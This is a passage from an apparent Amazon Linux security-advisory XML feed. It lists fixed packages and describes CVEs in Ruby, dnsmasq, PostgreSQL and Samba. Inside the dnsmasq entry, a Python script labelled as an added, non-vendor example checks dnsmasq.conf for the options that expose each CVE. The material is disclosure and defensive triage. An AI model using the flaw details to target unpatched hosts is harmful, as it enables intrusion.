</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9096" title="" id="CVE-2015-9096" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0898" title="" id="CVE-2017-0898" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0899" title="" id="CVE-2017-0899" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0900" title="" id="CVE-2017-0900" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0901" title="" id="CVE-2017-0901" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0902" title="" id="CVE-2017-0902" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0903" title="" id="CVE-2017-0903" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10784" title="" id="CVE-2017-10784" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14033" title="" id="CVE-2017-14033" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14064" title="" id="CVE-2017-14064" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby22" version="2.2.8" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-2.2.8-1.9.amzn1.x86_64.rpm</filename></package><package name="ruby22-devel" version="2.2.8" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-devel-2.2.8-1.9.amzn1.x86_64.rpm</filename></package><package name="ruby22-irb" version="2.2.8" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby22-irb-2.2.8-1.9.amzn1.noarch.rpm</filename></package><package name="ruby22-debuginfo" version="2.2.8" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-debuginfo-2.2.8-1.9.amzn1.x86_64.rpm</filename></package><package 
name="rubygems22-devel" version="2.4.5.2" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems22-devel-2.4.5.2-1.9.amzn1.noarch.rpm</filename></package><package name="rubygems22" version="2.4.5.2" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems22-2.4.5.2-1.9.amzn1.noarch.rpm</filename></package><package name="rubygem22-bigdecimal" version="1.2.6" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-bigdecimal-1.2.6-1.9.amzn1.x86_64.rpm</filename></package><package name="ruby22-libs" version="2.2.8" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-libs-2.2.8-1.9.amzn1.x86_64.rpm</filename></package><package name="ruby22-doc" version="2.2.8" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby22-doc-2.2.8-1.9.amzn1.noarch.rpm</filename></package><package name="rubygem22-psych" version="2.0.8.1" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-psych-2.0.8.1-1.9.amzn1.x86_64.rpm</filename></package><package name="rubygem22-io-console" version="0.4.3" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-io-console-0.4.3-1.9.amzn1.x86_64.rpm</filename></package><package name="ruby22-libs" version="2.2.8" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-libs-2.2.8-1.9.amzn1.i686.rpm</filename></package><package name="rubygem22-psych" version="2.0.8.1" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-psych-2.0.8.1-1.9.amzn1.i686.rpm</filename></package><package name="ruby22-debuginfo" version="2.2.8" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-debuginfo-2.2.8-1.9.amzn1.i686.rpm</filename></package><package name="ruby22" version="2.2.8" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-2.2.8-1.9.amzn1.i686.rpm</filename></package><package name="ruby22-devel" version="2.2.8" release="1.9.amzn1" epoch="0" 
arch="i686"><filename>Packages/ruby22-devel-2.2.8-1.9.amzn1.i686.rpm</filename></package><package name="rubygem22-io-console" version="0.4.3" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-io-console-0.4.3-1.9.amzn1.i686.rpm</filename></package><package name="rubygem22-bigdecimal" version="1.2.6" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-bigdecimal-1.2.6-1.9.amzn1.i686.rpm</filename></package><package name="rubygem23-json" version="1.8.3.1" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-json-1.8.3.1-1.17.amzn1.x86_64.rpm</filename></package><package name="ruby23-doc" version="2.3.5" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby23-doc-2.3.5-1.17.amzn1.noarch.rpm</filename></package><package name="rubygem23-did_you_mean" version="1.0.0" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem23-did_you_mean-1.0.0-1.17.amzn1.noarch.rpm</filename></package><package name="rubygems23-devel" version="2.5.2.1" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems23-devel-2.5.2.1-1.17.amzn1.noarch.rpm</filename></package><package name="rubygems23" version="2.5.2.1" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems23-2.5.2.1-1.17.amzn1.noarch.rpm</filename></package><package name="ruby23-debuginfo" version="2.3.5" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-debuginfo-2.3.5-1.17.amzn1.x86_64.rpm</filename></package><package name="rubygem23-psych" version="2.1.0.1" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-psych-2.1.0.1-1.17.amzn1.x86_64.rpm</filename></package><package name="ruby23-libs" version="2.3.5" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-libs-2.3.5-1.17.amzn1.x86_64.rpm</filename></package><package name="ruby23-irb" version="2.3.5" release="1.17.amzn1" epoch="0" 
arch="noarch"><filename>Packages/ruby23-irb-2.3.5-1.17.amzn1.noarch.rpm</filename></package><package name="ruby23" version="2.3.5" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-2.3.5-1.17.amzn1.x86_64.rpm</filename></package><package name="rubygem23-bigdecimal" version="1.2.8" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-bigdecimal-1.2.8-1.17.amzn1.x86_64.rpm</filename></package><package name="rubygem23-io-console" version="0.4.5" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-io-console-0.4.5-1.17.amzn1.x86_64.rpm</filename></package><package name="ruby23-devel" version="2.3.5" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-devel-2.3.5-1.17.amzn1.x86_64.rpm</filename></package><package name="rubygem23-psych" version="2.1.0.1" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-psych-2.1.0.1-1.17.amzn1.i686.rpm</filename></package><package name="rubygem23-io-console" version="0.4.5" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-io-console-0.4.5-1.17.amzn1.i686.rpm</filename></package><package name="rubygem23-json" version="1.8.3.1" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-json-1.8.3.1-1.17.amzn1.i686.rpm</filename></package><package name="ruby23-devel" version="2.3.5" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-devel-2.3.5-1.17.amzn1.i686.rpm</filename></package><package name="ruby23-debuginfo" version="2.3.5" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-debuginfo-2.3.5-1.17.amzn1.i686.rpm</filename></package><package name="ruby23" version="2.3.5" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-2.3.5-1.17.amzn1.i686.rpm</filename></package><package name="rubygem23-bigdecimal" version="1.2.8" release="1.17.amzn1" epoch="0" 
arch="i686"><filename>Packages/rubygem23-bigdecimal-1.2.8-1.17.amzn1.i686.rpm</filename></package><package name="ruby23-libs" version="2.3.5" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-libs-2.3.5-1.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-907</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-907: critical priority package update for dnsmasq</title><issued date="2017-10-02 17:05:00" /><updated date="2017-10-02 21:47:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-14496:
An integer underflow flaw leading to a buffer over-read was found in dnsmasq in the EDNS0 code. An attacker could send crafted DNS packets to dnsmasq which would cause it to crash. This issue only affected configurations using one of the options: add-mac, add-cpe-id, or add-subnet.
1495416:
CVE-2017-14496 dnsmasq: integer underflow leading to buffer over-read in the EDNS0 code
CVE-2017-14495:
A memory exhaustion flaw was found in dnsmasq in the EDNS0 code. An attacker could send crafted DNS packets that trigger memory allocations which are never freed, leading to unbounded memory consumption and eventually a crash. This issue only affected configurations using one of the options: add-mac, add-cpe-id, or add-subnet.
1495415:
CVE-2017-14495 dnsmasq: memory exhaustion vulnerability in the EDNS0 code
CVE-2017-14494:
An information leak was found in dnsmasq in the DHCPv6 relay code. An attacker on the local network could send crafted DHCPv6 packets to dnsmasq causing it to forward the contents of process memory, potentially leaking sensitive data.
1495412:
CVE-2017-14494 dnsmasq: information leak in the DHCPv6 relay code
CVE-2017-14493:
A stack buffer overflow was found in dnsmasq in the DHCPv6 code. An attacker on the local network could send a crafted DHCPv6 request to dnsmasq which would cause it to crash or, potentially, execute arbitrary code.
1495411:
CVE-2017-14493 dnsmasq: stack buffer overflow in the DHCPv6 code
CVE-2017-14492:
A heap buffer overflow was discovered in dnsmasq in the IPv6 router advertisement (RA) handling code. An attacker on the local network segment could send crafted RAs to dnsmasq which would cause it to crash or, potentially, execute arbitrary code. This issue only affected configurations using one of these options: enable-ra, ra-only, slaac, ra-names, ra-advrouter, or ra-stateless.
1495410:
CVE-2017-14492 dnsmasq: heap overflow in the IPv6 router advertisement code
CVE-2017-14491:
A heap buffer overflow was found in dnsmasq in the code responsible for building DNS replies. An attacker could send crafted DNS packets to dnsmasq which would cause it to crash or, potentially, execute arbitrary code.
1495409:
CVE-2017-14491 dnsmasq: heap overflow in the code responsible for building DNS replies
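Three of the six CVEs above are reachable only when particular dnsmasq options are set (add-mac, add-cpe-id or add-subnet for the EDNS0 issues; enable-ra, ra-only, slaac, ra-names, ra-advrouter or ra-stateless for the router advertisement issue), while the advisory names no option precondition for the other three. The following Python is an added example, not code from dnsmasq or from Amazon: it parses a dnsmasq.conf body and reports which of the advisory's CVEs a given configuration exposes. It assumes the dnsmasq.conf syntax in which enable-ra and the add-* options are standalone lines and the other RA modes appear as comma-separated fields of a dhcp-range value; the sample configuration is constructed for the example and the function names are the example's own.

```python
# Option names quoted in the advisory as preconditions for the conditional CVEs.
EDNS0_OPTIONS = {"add-mac", "add-cpe-id", "add-subnet"}
RA_OPTIONS = {"enable-ra", "ra-only", "slaac", "ra-names", "ra-advrouter", "ra-stateless"}


def enabled_options(conf_text):
    """Return the set of option names switched on in a dnsmasq.conf body.

    Handles bare 'name' lines, 'name=value' lines, and the router-advertisement
    modes that dnsmasq takes as comma-separated fields of a dhcp-range value
    (for example 'dhcp-range=::,constructor:eth0,ra-names').  Files pulled in
    with conf-file= or conf-dir= are not followed; pass their contents in too.
    """
    found = set()
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, _, value = line.partition("=")
        name = name.strip()
        found.add(name)
        if name == "dhcp-range":
            found.update(field.strip() for field in value.split(","))
    return found


def applicable_cves(conf_text):
    """Map each CVE in ALAS-2017-907 to the enabled option(s) that make it
    reachable on this configuration, or to None where the advisory names no
    option precondition (those apply to every dnsmasq install)."""
    opts = enabled_options(conf_text)
    result = {
        "CVE-2017-14491": None,  # heap overflow building DNS replies: any DNS client
        "CVE-2017-14493": None,  # DHCPv6 stack overflow: attacker on the local network
        "CVE-2017-14494": None,  # DHCPv6 relay memory leak: attacker on the local network
    }
    edns0 = sorted(opts.intersection(EDNS0_OPTIONS))
    if edns0:
        result["CVE-2017-14495"] = edns0  # EDNS0 memory exhaustion
        result["CVE-2017-14496"] = edns0  # EDNS0 integer underflow / buffer over-read
    ra = sorted(opts.intersection(RA_OPTIONS))
    if ra:
        result["CVE-2017-14492"] = ra  # heap overflow in RA handling
    return result


# Constructed sample (not taken from any real host): a LAN resolver that tags
# upstream queries with the client subnet and sends IPv6 router advertisements.
SAMPLE_CONF = """\
# /etc/dnsmasq.conf (constructed example)
interface=eth0
bind-interfaces
add-subnet=24,64
dhcp-range=192.168.1.50,192.168.1.150,12h
dhcp-range=::,constructor:eth0,ra-names,slaac
"""


def report(conf_text):
    """One human-readable line per CVE that applies to this configuration."""
    lines = []
    for cve, why in sorted(applicable_cves(conf_text).items()):
        reason = "no option precondition" if why is None else "enabled: " + ", ".join(why)
        lines.append(cve + ": " + reason)
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_CONF)))
```

The report is for triage only: because CVE-2017-14491 needs no option at all, every dnsmasq install in scope needs the package update regardless of what the configuration check says; the option-gated CVEs merely tell you which hosts are also exposed through EDNS0 and RA handling.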
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14491" title="" id="CVE-2017-14491" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14492" title="" id="CVE-2017-14492" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14493" title="" id="CVE-2017-14493" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14494" title="" id="CVE-2017-14494" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14495" title="" id="CVE-2017-14495" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14496" title="" id="CVE-2017-14496" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="dnsmasq-utils" version="2.76" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/dnsmasq-utils-2.76-2.14.amzn1.x86_64.rpm</filename></package><package name="dnsmasq-debuginfo" version="2.76" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/dnsmasq-debuginfo-2.76-2.14.amzn1.x86_64.rpm</filename></package><package name="dnsmasq" version="2.76" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/dnsmasq-2.76-2.14.amzn1.x86_64.rpm</filename></package><package name="dnsmasq" version="2.76" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/dnsmasq-2.76-2.14.amzn1.i686.rpm</filename></package><package name="dnsmasq-debuginfo" version="2.76" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/dnsmasq-debuginfo-2.76-2.14.amzn1.i686.rpm</filename></package><package name="dnsmasq-utils" version="2.76" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/dnsmasq-utils-2.76-2.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2017-908</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-908: medium priority package update for postgresql96</title><issued date="2017-10-06 16:51:00" /><updated date="2017-10-10 20:01:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7547:
An authorization flaw was found in the way PostgreSQL handled access to the pg_user_mappings view on foreign servers. A remote, authenticated attacker could potentially use this flaw to retrieve passwords from the user mappings defined by the foreign server owners without actually having the privileges to do so.
1477185:
CVE-2017-7547 postgresql: pg_user_mappings view discloses passwords to users lacking server privileges
CVE-2017-7546:
It was found that authenticating to a PostgreSQL database account with an empty password was possible despite libpq&#039;s refusal to send an empty password. A remote attacker could potentially use this flaw to gain access to database accounts with empty passwords.
1477184:
CVE-2017-7546 postgresql: Empty password accepted in some authentication methods
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7546" title="" id="CVE-2017-7546" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7547" title="" id="CVE-2017-7547" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql96-devel" version="9.6.4" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-devel-9.6.4-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.4" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-debuginfo-9.6.4-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.4" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython26-9.6.4-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql96-docs" version="9.6.4" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-docs-9.6.4-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql96-libs" version="9.6.4" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-libs-9.6.4-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plperl" version="9.6.4" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plperl-9.6.4-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql96-test" version="9.6.4" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-test-9.6.4-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plpython27" version="9.6.4" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython27-9.6.4-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql96-static" version="9.6.4" release="1.77.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql96-static-9.6.4-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql96-contrib" version="9.6.4" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-contrib-9.6.4-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql96-server" version="9.6.4" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-server-9.6.4-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql96" version="9.6.4" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-9.6.4-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql96-test" version="9.6.4" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-test-9.6.4-1.77.amzn1.i686.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.4" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-debuginfo-9.6.4-1.77.amzn1.i686.rpm</filename></package><package name="postgresql96-devel" version="9.6.4" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-devel-9.6.4-1.77.amzn1.i686.rpm</filename></package><package name="postgresql96-plperl" version="9.6.4" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plperl-9.6.4-1.77.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.4" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython26-9.6.4-1.77.amzn1.i686.rpm</filename></package><package name="postgresql96-docs" version="9.6.4" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-docs-9.6.4-1.77.amzn1.i686.rpm</filename></package><package name="postgresql96-server" version="9.6.4" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-server-9.6.4-1.77.amzn1.i686.rpm</filename></package><package name="postgresql96-contrib" version="9.6.4" release="1.77.amzn1" epoch="0" 
arch="i686"><filename>Packages/postgresql96-contrib-9.6.4-1.77.amzn1.i686.rpm</filename></package><package name="postgresql96-static" version="9.6.4" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-static-9.6.4-1.77.amzn1.i686.rpm</filename></package><package name="postgresql96" version="9.6.4" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-9.6.4-1.77.amzn1.i686.rpm</filename></package><package name="postgresql96-libs" version="9.6.4" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-libs-9.6.4-1.77.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython27" version="9.6.4" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython27-9.6.4-1.77.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-909</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-909: medium priority package update for samba</title><issued date="2017-10-12 19:37:00" /><updated date="2017-10-13 00:09:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-12163:
An information leak flaw was found in the way SMB1 protocol was implemented by Samba. A malicious client could use this flaw to dump server memory contents to a file on the samba share or to a shared printer, though the exact area of server memory cannot be controlled by the attacker.
1491206:
CVE-2017-12163 Samba: Server memory information leak over SMB1
CVE-2017-12151:
A flaw was found in the way the Samba client used encryption when the maximum protocol was set to SMB3. A connection could lose its signing and encryption requirements when following DFS redirects, allowing a man-in-the-middle attacker to read or alter the contents of the connection.
1488197:
CVE-2017-12151 samba: SMB2 connections don't keep encryption across DFS redirects
CVE-2017-12150:
It was found that samba did not enforce &quot;SMB signing&quot; when certain configuration options were enabled. A remote attacker could launch a man-in-the-middle attack and retrieve information in plain-text.
1488400:
CVE-2017-12150 samba: Some code paths don't enforce SMB signing when they should
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12150" title="" id="CVE-2017-12150" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12151" title="" id="CVE-2017-12151" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12163" title="" id="CVE-2017-12163" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ctdb-tests" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="libsmbclient-devel" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-devel-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-devel" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-test" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-common-tools" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-debuginfo" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-test-libs" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-libs-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="ctdb" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-client-libs" version="4.6.2" release="11.36.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/samba-client-libs-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="libsmbclient" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-client" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="libwbclient" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-devel-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.6.2" release="11.36.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-pidl-4.6.2-11.36.amzn1.noarch.rpm</filename></package><package name="samba-libs" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-libs-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-krb5-printing" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-krb5-printing-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.6.2" release="11.36.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.6.2-11.36.amzn1.noarch.rpm</filename></package><package name="samba-python" version="4.6.2" release="11.36.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/samba-python-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-clients-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-modules" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-modules-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-libs" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="samba-test-libs" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-libs-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-libs-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="ctdb" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="samba-test" version="4.6.2" release="11.36.amzn1" epoch="0" 
arch="i686"><filename>Packages/samba-test-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="samba-winbind-clients" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-clients-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="samba-common-tools" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-tools-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="ctdb-tests" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-tests-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="samba" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="libsmbclient" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="samba-common-libs" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-libs-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="samba-winbind" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="libwbclient-devel" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-devel-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="libwbclient" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/samba-debuginfo-4.6.2-11.36.amzn1.i686.rpm</filename></package><package 
